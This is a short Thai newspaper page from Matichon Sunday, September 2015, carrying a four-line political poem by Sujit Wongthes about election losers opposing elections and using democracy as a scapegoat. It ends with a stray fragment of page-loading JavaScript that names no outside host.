มติชน วันอาทิตย์

20 กันยายน 2558

 

แพ้เลือกตั้งต่อต้านการเลือกตั้ง

การเมืองพังเศรษฐกิจก้าวไม่ได้

โลกประณามคำแก้ตัวมั่วมั่วไป

ก็ฉวยประชาธิปไตยเป็นแพะพลาง

 

สุจิตต์ วงษ์เทศ

ศุกร์ 18 กันยายน 2558d.getElementsByTagName(‘head’)[0].appendChild(s);var d=document;var s=d.createElement(‘script’);